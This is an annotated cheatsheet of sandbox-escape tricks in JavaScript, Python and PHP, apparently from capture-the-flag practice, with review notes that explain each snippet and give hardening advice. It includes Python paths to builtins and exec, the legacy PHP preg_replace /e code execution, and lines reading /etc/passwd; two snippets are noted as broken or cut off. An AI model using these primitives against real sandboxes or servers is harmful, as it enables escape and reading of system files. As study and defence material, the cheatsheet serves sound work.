Fuck Jails

Js Cheatsheet
// Without letters
// Builds a value from punctuation only ([], +, !) by relying on implicit type coercion.
// NOTE(review): as written this line does not parse, because `!=` is a binary operator and
// cannot directly follow `+`. Presumably `![]` was intended; confirm against the original page.
// Defensive takeaway: a character deny-list ("no letters") does not limit what JavaScript can
// express, so input filters of that kind are not a containment mechanism.
[[]]+[]+!=[]

// Equality
// alert`1` is a tagged-template call: it invokes alert without parentheses and passes the
// template's string array (['1']) as the first argument. Both calls return undefined, so the
// comparison itself is only undefined == undefined.
alert(1) == alert`1`
// Compares `this` with its own constructor; the result depends on what `this` is bound to
// at the point where the expression is evaluated.
this == this.constructor

// `global` is the Node.js name for the global object (globalThis is the portable spelling).
// The comparison below is true only where top-level `this` is that global object, e.g. the
// Node REPL. In a CommonJS module `this` is module.exports, and in an ES module it is undefined.
global.car = 'DeLorean';
this.car === global.car

// Prototype pollution
// NOTE(review): no prototype is modified in this snippet. It shows top-level `this` aliasing
// the global object: where that holds (e.g. the Node REPL), writing this.car overwrites
// global.car and the last line is true; inside a CommonJS module it is false because `this`
// is module.exports.
// Prototype pollution proper is a write that reaches Object.prototype, typically through
// unvalidated keys such as __proto__ or constructor when merging untrusted data. The usual
// defences are null-prototype objects (Object.create(null)) or Map for dictionaries,
// Object.hasOwn checks on lookups, and rejecting those keys during merges.
global.car = 'DeLorean';
this.car = 'Batmobile';
global.car === 'Batmobile';


// Constructor injection
// NOTE(review): the code below is an ordinary constructor function. Called with `new`, `this`
// is the freshly created object, so car.car is 'Batmobile'. Called without `new` in sloppy
// mode, `this` would be the global object and the assignment would land there instead;
// strict mode turns that call into a TypeError, which is one reason to keep it enabled.
function Car() {
this.car = 'Batmobile'
}
const car = new Car();
car.car === 'Batmobile';

Pyjail Cheatsheet
(lambda:...).__globals__
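# obtain builtins from generators (gi_frame / ag_frame are frame objects, which carry an f_builtins attribute;
# the gi_frame line below appears to be cut off after the final dot in this copy).
# Introspection paths like these are why filtering names inside eval/exec is not a security boundary;
# untrusted code belongs in a separate, OS-sandboxed process.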
(_ for _ in ()).gi_frame.
(await _ for _ in ()).ag_frame.f_builtins
@exec
@input
def a():
# can also be a class instead of a function
pass
# walrus operator (>= python3.8)
# using the walrus operator:
[a:=().__doc__, print(a)]
# same effect without it:
(lambda a: print(a))(().__doc__)
Php Cheatsheet
// Is this a string ?
// Type juggling: applying ++ to a numeric string converts it, so the variable silently
// changes type from string to int. Code that must tell the two apart should check the type
// explicitly and compare with === rather than ==.
$obfs = "1"; //string "1"
$obfs++; //int 2
RCE via preg_replace()
// Argument order: pattern, replacement, subject.
preg_replace(pattern,replace,base);
// The /e modifier made PHP evaluate the replacement string as code for each match.
// It was deprecated in PHP 5.5.0 and removed in PHP 7.0.0; on current versions the call
// emits a warning about the unknown modifier and returns NULL without evaluating anything.
// When reviewing legacy code, replace /e with preg_replace_callback() and never let request
// data supply the pattern or its modifiers.
preg_replace("/a/e","phpinfo()","x")
// Can we read /etc/passwd ?
// The calls below are different primitives that reach the same file:
//   file_get_contents() returns the contents as a string;
//   readfile() writes the contents to the output buffer;
//   fopen() only returns a handle, and nothing is read until fread()/fgets() is called on it;
//   include / require_once emit text outside <?php tags verbatim and execute anything inside them.
// Hardening note: include and require_once are language constructs, not functions, so a
// disable_functions deny-list does not cover them. Restrict filesystem reach with open_basedir
// and OS-level permissions, and never build these paths from request data.
file_get_contents("/etc/passwd");
readfile("/etc/passwd");
fopen("/etc/passwd","r");
include("/etc/passwd");
require_once("/etc/passwd");
Docs